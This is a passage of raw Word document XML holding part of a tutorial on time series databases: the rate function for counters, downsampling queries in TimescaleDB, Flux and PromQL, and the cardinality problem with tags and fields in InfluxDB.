          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time Series Query Patterns and Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B095D44" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The rate function — derivative of a counter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BB4BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061E252" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Problem: CPU usage is stored as a monotonically increasing counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263442F3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  cpu_total_time: 1000, 1100, 1300, 1600, 2000, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF931FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF2B86" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  We want: CPU usage rate (% per second), not the cumulative total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27357625" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49022156" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  rate(cpu_total_time[5m]) = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5CD69" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (last_value_in_window - first_value_in_window) / window_duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6627EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    = (2000 - 1000) / 300 seconds = 3.33 counter_units/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0616E028" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A21A53" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Handle counter resets (process restart → counter resets to 0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8BA0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Detect: new_value &lt; previous_value → counter reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66144F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Adjust: add previous_value to new_value before computing rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325EC25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="40E1324A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Prometheus rate() query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A531B79" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  rate(node_cpu_seconds_total{cpu="0",mode="user"}[5m])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0151BB97" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37964009" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Returns: rate of CPU time spent in user mode, averaged over 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A236B3F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD603E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>InfluxDB equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5FF78D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  derivative(mean("value"), 1s)  -- rate of change per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8BF21" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB925D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  difference("value") / difference(time) -- explicit derivative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED5C35" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time bucketing and downsampling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF73272" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F572D69" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Raw data: 1 reading per second per sensor (86,400 rows/sensor/day)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75E180" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Dashboard need: 1 reading per minute per sensor (1,440 rows/sensor/day)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B58A27F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="725EC869" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SQL with time buckets (TimescaleDB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B6206" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C6004" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    time_bucket('1 minute', time) AS minute,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C3924" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    device_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9030D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    AVG(temperature) AS avg_temp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156F5EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    MAX(temperature) AS max_temp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00251D4E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    MIN(temperature) AS min_temp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE1E027" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    COUNT(*) AS sample_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660FA97" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  FROM metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417A4CB2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE time &gt; NOW() - INTERVAL '24 hours'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD1A57" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    AND device_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C482EA2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  GROUP BY minute, device_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831CB14" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY minute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69488A04" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="1EE3ADCC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>InfluxDB Flux equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F25A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  from(bucket: "telemetry")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A36602" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    |&gt; range(start: -24h)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D3060" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    |&gt; filter(fn: (r) =&gt; r.device_id == "42")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37857797" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    |&gt; aggregateWindow(every: 1m, fn: mean, createEmpty: false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649B5D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    |&gt; yield(name: "mean")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1FF14" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="2733736A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PromQL (Prometheus) equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF787B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  avg_over_time(temperature{device_id="42"}[1m])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471DF1C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cardinality problem — the critical operational challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D068AE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704CC6CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>High cardinality in time series = many unique series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73C6BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="109C553F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Series = unique combination of measurement + tag values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F0CC7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  measurement: "http_requests"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A25A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  tags: method, status_code, handler, instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F235F13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B03027D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If: 10 methods × 50 status codes × 1000 handlers × 100 instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D836428" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  = 50,000,000 unique series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A617D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED6D9F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  InfluxDB: each series has an entry in the series index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993306B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    50M series = 50M index entries → doesn't fit in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB579E6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Index lookups become disk-bound → slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23125528" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159A8E4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Problem symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0DFA3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    High memory usage (index swaps to disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17803B85" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Slow query planning (finding relevant series takes seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7825D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Slow writes (updating series index per write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7550C913" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373ED68A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>High cardinality sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B930B2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  User IDs as tags (unique per user → M users = M series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DD7DB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Request IDs as tags (unique per request → catastrophic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9ED96E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Error messages as tags (unbounded unique values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48083357" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Timestamps as tags (completely unique → ∞ series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA67D79" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728883C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Rules for tag vs field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF5A9C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Tag: low cardinality (&lt; 100,000 unique values), used for filtering/grouping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743F368" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    hostname, region, environment, service_name, http_method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DDA35C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Field: high cardinality or not used for filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D104AB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    request_id, user_id, error_message, payload_content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAD04E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA16089" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Tags are indexed → filtering is fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10017384" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Fields are stored in data blocks → filtering requires full scan of blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9394A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D79769" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Mitigation strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D87495" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replace high-cardinality tags with fields (accept full scan for those dimensions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD3F04" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Roll up at ingestion (pre-aggregate by lower-cardinality dimensions before storing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67297D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Use a different database for high-cardinality data (Loki for logs, tracing DB for traces)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF5A42" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InfluxDB Architecture — Production Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19265226" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A29CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
